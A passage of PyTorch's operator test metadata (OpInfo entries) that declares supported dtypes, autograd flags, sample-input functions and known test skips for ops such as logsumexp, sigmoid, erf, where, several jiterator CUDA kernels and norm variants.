https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), OpInfo('zero_', op=lambda x: torch.zero_(x.clone()), method_variant=None, inplace_variant=torch.Tensor.zero_, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_gradgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), ), sample_inputs_func=sample_inputs_zero_), BinaryUfuncInfo('special.xlog1py', aten_name='special_xlog1py', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=all_types_and(torch.bool, torch.bfloat16), backward_dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_one_python_scalar=True, skips=( # nan vs 0 comparisons # https://github.com/pytorch/pytorch/issues/74279 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), )), BinaryUfuncInfo('special.zeta', aten_name='special_zeta', dtypes=all_types_and(torch.bool), promotes_int_to_float=True, supports_autograd=False, supports_one_python_scalar=True), # TODO: FIXME # OpInfo entry to verify the gradient formula of `other`/`q` # BinaryUfuncInfo('special.zeta', # op=lambda q, x, **kwargs: torch.special.zeta(x, q, **kwargs), # aten_name='special_zeta', # variant_test_name='grad', # dtypes=all_types_and(torch.bool), # promotes_int_to_float=True, # supports_autograd=True, # supports_rhs_python_scalar=False, # decorators=[ # # Derivative wrt first tensor not implemented # DecorateInfo(unittest.expectedFailure, "TestCommon", # "test_floating_inputs_are_differentiable") # ], # skips=( # # Lambda doesn't work in JIT test # # AssertionError: JIT Test does not execute any logic # DecorateInfo(unittest.skip("Skipped!"), "TestJit", "test_variant_consistency_jit"), # )), OpInfo('logsumexp', aliases=('special.logsumexp',), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.half), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_logsumexp), OpInfo('trace', dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_trace), OpInfo('transpose', ref=_numpy_ref_transpose, aliases=('swapdims', 'swapaxes'), assert_jit_shape_analysis=True, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, sample_inputs_func=sample_inputs_transpose_swapdims), OpInfo('T', op=lambda x: x.T, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('H', op=lambda x: x.H, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, 
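# (Tensor.H is an attribute, hence the lambda above; for a 2-D complex tensor it is
#  the conjugate transpose, i.e. roughly x.transpose(0, 1).conj(), and just the
#  transpose for real matrices.)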
supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_T), OpInfo('mT', op=lambda x: x.mT, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('mH', op=lambda x: x.mH, aliases=('adjoint',), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),), sample_inputs_func=sample_inputs_adjoint), OpInfo('tril', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('triu', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tril_triu), OpInfo('kron', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_kron), OpInfo('inner', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_inner, ), OpInfo('tensordot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tensordot, skips=( # Skip operator schema test because this is a functional and not an operator. 
# Reference: https://github.com/pytorch/pytorch/issues/54574 DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ) ), OpInfo('to_sparse', op=lambda x, *args: x.to_sparse(*args), sample_inputs_func=sample_inputs_to_sparse, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), backward_dtypes=floating_types(), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_sparse_csr=True, check_batched_grad=False, check_batched_gradgrad=False, skips=( # to_sparse does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_nondifferentiable', dtypes=(torch.cdouble,)), # NotImplementedError: Could not run 'aten::normal_' with arguments from the 'SparseCPU' backend DecorateInfo(unittest.skip(""), 'TestCommon', 'test_noncontiguous_samples'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Allowed exception: sparse tensors don't have strides DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_backward'), # TODO: implement csr.to_sparse(sample_dim) where sampled_dim is 1. DecorateInfo(unittest.skip("csr.to_sparse(1) not implemented. Skipped!"), 'TestSparseCSR', 'test_sparse_csr_consistency'), ) ), OpInfo('logcumsumexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16), skips=( # AssertionError: UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
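# (backward_dtypes / backward_dtypesIfCUDA narrow the dtypes exercised by the
#  gradient tests when an op's backward supports fewer dtypes than its forward,
#  as for logcumsumexp here.)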
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cuda'), ), sample_inputs_func=sample_inputs_logcumsumexp, error_inputs_func=error_inputs_logcumsumexp), UnaryUfuncInfo('sigmoid', aliases=('special.expit', 'nn.functional.sigmoid'), aten_backward_name='sigmoid_backward', ref=reference_sigmoid if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 1e-2, torch.complex64: 1e-1, torch.bfloat16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/56012 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.complex64, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.chalf, torch.complex64, torch.cdouble]), # alias, nn.functional.sigmoid, will produce (because of warning string saved): # "RuntimeError: Expected to not find "sigmoid" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping')), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.complex32, torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, # sigmoid(z) = 1 / (1 + exp(-z)), at z = j * pi * odd_number, the denominator is zero reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 1j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), UnaryUfuncInfo('digamma', ref=scipy.special.digamma if TEST_SCIPY else _NOTHING, aliases=('special.psi', 'special.digamma',), decorators=(precisionOverride({torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.entr', ref=scipy.special.entr if TEST_SCIPY else _NOTHING, aten_name='special_entr', supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-1, torch.bfloat16: 1e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.float16]), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_entr), UnaryUfuncInfo('special.ndtri', ref=scipy.special.ndtri if TEST_SCIPY else _NOTHING, domain=(0, 1), aten_name='special_ndtri', dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.log_ndtr', aten_name='special_log_ndtr', ref=scipy.special.log_ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('erf', ref=scipy.special.erf if TEST_SCIPY else _NOTHING, aliases=('special.erf', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfc', ref=scipy.special.erfc if TEST_SCIPY else _NOTHING, aliases=('special.erfc', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfinv', ref=scipy.special.erfinv if TEST_SCIPY else _NOTHING, aliases=('special.erfinv', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2, torch.float32: 1e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, domain=(-1, 1), skips=( # Reference: https://github.com/pytorch/pytorch/pull/49155#issuecomment-742664611 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), )), OpInfo("nn.functional.smooth_l1_loss", ref=reference_smooth_l1_loss, sample_inputs_func=sample_inputs_smooth_l1_loss, dtypes=floating_types_and(torch.float16, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),)), OpInfo( "nn.functional.l1_loss", ref=loss_reference_reduction_wrapper(lambda input, target: np.abs(input - target)), aten_backward_name='l1_loss_backward', sample_inputs_func=sample_inputs_l1_loss, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), backward_dtypes=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. 
DecorateInfo( unittest.expectedFailure, "TestJit", "test_variant_consistency_jit", dtypes=(torch.float32,), ), ), ), UnaryUfuncInfo('lgamma', ref=reference_lgamma if TEST_SCIPY else _NOTHING, aliases=('special.gammaln', ), decorators=(precisionOverride({torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/50140#discussion_r552615345 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cpu', dtypes=[torch.bfloat16]), # Reference: https://github.com/pytorch/pytorch/pull/50140#issuecomment-756150214 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS), ), # lgamma has multiple singularities at x <= 0 reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)), OpInfo( 'logdet', dtypes=floating_types(), supports_out=False, sample_inputs_func=sample_inputs_logdet, decorators=(skipCPUIfNoLapack, skipCUDAIfNoMagma)), # `log_softmax` supports different dtypes based on whether the `dtype` argument # is passed or not. Hence two OpInfo entries, one with dtype and the other without. OpInfo( 'log_softmax', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, aten_backward_name='_log_softmax_backward_data', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_softmax_variant, supports_forward_ad=True, assert_autodiffed=True), OpInfo( 'log_softmax', variant_test_name='dtype', aliases=('special.log_softmax', 'nn.functional.log_softmax'), supports_out=True, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf), sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True), supports_forward_ad=True, assert_autodiffed=True), UnaryUfuncInfo('logit', aten_backward_name='logit_backward', ref=scipy.special.logit if TEST_SCIPY else _NOTHING, domain=(0, 1), aliases=('special.logit', ), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 5e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_logit), OpInfo('where', # Currently only the `input` is tested in gradcheck. # If we pass `condition` first, none of the inputs that support # autograd will be tested. Hence the following lambda.
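# (Hedged illustration, not part of the test matrix: gradcheck only
# differentiates SampleInput.input, i.e. the first positional argument, so the
# lambda below moves the differentiable tensor into that slot:
#
#     op(self, condition, other) -> torch.where(condition, self, other)
#
# A boolean `condition` can never require grad, so passing it first would
# leave nothing for gradcheck to exercise.)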
op=lambda self, condition, other: torch.where(condition, self, other), ref=lambda self, condition, other: np.where(condition, self, other), sample_inputs_func=sample_inputs_where, reference_inputs_func=reference_inputs_where, error_inputs_func=error_inputs_where, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=( DecorateInfo(onlyCUDA, "TestCommon", 'test_errors'),), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), ), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf)), OpInfo('nonzero', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), sample_inputs_func=sample_inputs_nonzero, supports_autograd=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # nonzero(): argument 'out' must be Tensor, not tuple DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # https://github.com/pytorch/pytorch/issues/67458 DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # nonzero does not raise a warning when out is resized DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Can't find schemas for this operator for some reason DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), )), # The following tests are for jiterator's python interface # Jiterator can be used to author elementwise CUDA kernels # jiterator._create_jit_fn returns a callable that behaves like a regular pytorch op # See create_jit_fn in jiterator.py for more information; a commented usage sketch follows below UnaryUfuncInfo( 'jiterator_unary', op=torch.cuda.jiterator._create_jit_fn("template <typename T> T unary(T x) { return x * x + x; }"), ref=lambda x: x * x + x, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), supports_out=False, supports_autograd=False,  # jiterator ops don't have a backward defined decorators=[ onlyCUDA, skipCUDAIfRocm, DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_extremal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_hard'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_normal'), DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}), 'TestUnaryUfuncs', 'test_reference_numerics_small'), ], skips=( # Jiterator ops don't support neg or conj views DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops don't support CompositeCompliantTensor # The following test should be an expectedFailure, but it's causing cascading failures in CUDA, thus it is skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Skip reference_numerics tests for bool type, as the defined function doesn't work for bool DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bool]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_hard', dtypes=[torch.bool]),
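# (Commented usage sketch for the jiterator entries in this block -- hedged:
# the API is internal/beta and needs a CUDA device; this mirrors the
# documented _create_jit_fn example rather than anything specific to this file:
#
#     code_string = "template <typename T> T my_op(T x, T y, T alpha) { return -x + alpha * y; }"
#     jitted_fn = torch.cuda.jiterator._create_jit_fn(code_string, alpha=1.0)
#     a = torch.rand(3, device='cuda')
#     b = torch.rand(3, device='cuda')
#     result = jitted_fn(a, b, alpha=3.14)  # elementwise -a + 3.14 * b
# )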
DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=[torch.bool]), # Expected failure: torch.jiterator_unary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T x, T y, T alpha) { return x + alpha * y; }", alpha=1), ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-3.14), supports_out=False, supports_autograd=False,  # jiterator ops don't have a backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops don't support neg or conj views DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops don't support CompositeCompliantTensor # The following test should be an expectedFailure, but it's causing cascading failures in CUDA, thus it is skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_binary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_4inputs_with_extra_args', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T i0, T i1, T i2, T i3, T alpha, T beta) { return alpha * i0 + beta * i1 + i2 + i3; }", alpha=1, beta=1), ref=lambda i0, i1, i2, i3, *, alpha=1, beta=1: alpha * i0 + beta * i1 + i2 + i3, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=4, alpha=3.14, beta=-4.20), supports_out=False, supports_autograd=False,  # jiterator ops don't have a backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops don't support neg or conj views DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops don't support CompositeCompliantTensor # The following test should be an expectedFailure, but it's causing cascading failures in CUDA, thus it is skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary_return_by_ref', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_return_by_ref(T i0, T i1, T& out0) { out0 = i0 + i1; } """, num_outputs=1), ref=lambda i0, i1: i0 + i1, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-0.42), supports_out=False, supports_autograd=False,  # jiterator ops don't have a backward defined
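# (Note on the return-by-ref variants here: outputs are declared as reference
# parameters (e.g. `T& out0`) in the C++ template and assigned inside the
# kernel; `num_outputs` tells _create_multi_output_jit_fn how many trailing
# reference parameters are outputs, and the resulting callable hands them back
# as ordinary tensors. This is a reading of the entries in this block, not a
# formal spec of the beta API.)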
supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops don't support neg or conj views DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops don't support CompositeCompliantTensor # The following test should be an expectedFailure, but it's causing cascading failures in CUDA, thus it is skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_binary_return_by_ref is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_2inputs_2outputs', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_2outputs(T i0, T i1, T& out0, T& out1) { out0 = i0 + i1; out1 = i0 - i1; } """, num_outputs=2), ref=lambda i0, i1, *, alpha=1: (i0 + i1, i0 - i1), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2), supports_out=False, supports_autograd=False,  # jiterator ops don't have a backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops don't support neg or conj views DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops don't support CompositeCompliantTensor # The following test should be an expectedFailure, but it's causing cascading failures in CUDA, thus it is skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_2inputs_2outputs is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), # `torch.norm` has multiple code paths depending on the value of `p`. # These paths have different dtype support, and JIT supports # most variants but not all of them. So we split the OpInfo entries # for `norm` based on the code paths and JIT support. OpInfo( "norm", sample_inputs_func=sample_inputs_norm, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), ), ), OpInfo('norm', variant_test_name='nuc', aten_name='nuclear_norm', sample_inputs_func=sample_inputs_norm_nuc, decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack], check_batched_gradgrad=False, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides!
check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types(), skips=( # RuntimeError not raised : # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 ) ), OpInfo('norm', variant_test_name='fro', aten_name='frobenius_norm', sample_inputs_func=sample_inputs_norm_fro, dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Arguments for call are not valid. 